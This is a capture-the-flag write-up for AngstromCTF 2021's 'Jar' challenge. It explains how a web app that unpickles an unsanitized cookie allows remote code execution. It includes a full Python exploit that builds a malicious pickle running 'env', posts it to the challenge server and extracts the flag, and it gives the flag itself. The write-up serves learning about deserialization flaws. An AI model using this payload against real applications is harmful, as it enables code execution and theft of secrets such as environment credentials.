
# AngstromCTF2021 Jar
By looking at the sourcecode we see that the package `pickle` i imported and used for deserialization. Looking at the `pickle` docs we find the warning:
Warning: The pickle module is not secure. Only unpickle data you trust.
We then notice that the data isn't sanitized. This enables us to use a deserialization attack to gain RCE.

We notice in the dockerfile that the flag is set as an environmental variable. Therefore by printing the environmental variables we can get the flag.

Coding up the payload we get:
# Web application is vulnerable to a deserialization attack
# https://medium.com/@abhishek.dev.kumar.94/sour-pickle-insecure-deserialization-with-python-pickle-module-efa812c0d565
import os
import pickle
import requests
import base64
import subprocess

# Class returns output of env when deserialized
class MyEvilPickle(object):
def __reduce__(self):
return (subprocess.check_output, ('env', ))

# Wrap class in list so we can append things serverside
pickle_data = pickle.dumps([MyEvilPickle()])

# Handle encoding and remove b''
pickle_data = str(base64.b64encode(pickle_data))
pickle_data = pickle_data[2:-1]

url = "https://jar.2021.chall.actf.co/"

# Contents cookie will be deserialized on server
cookie = dict(contents=pickle_data)
session = requests.Session()
r = session.post(url+"/add", cookies=cookie, data={"item":"lol_hax"})

# Get and parse returned cookies
env_vars = session.cookies.get_dict()["contents"]
env_vars = pickle.loads(base64.b64decode(env_vars))
env_vars = str(env_vars[0]).split("\\n")
# Find and print flag
for i in env_vars:
if "actf{" in i:
And we find the flag: `actf{you_got_yourself_out_of_a_pickle}`

Original writeup (https://github.com/emil-muller/CTFs/blob/main/angstromctf2021/jar/writeup.md).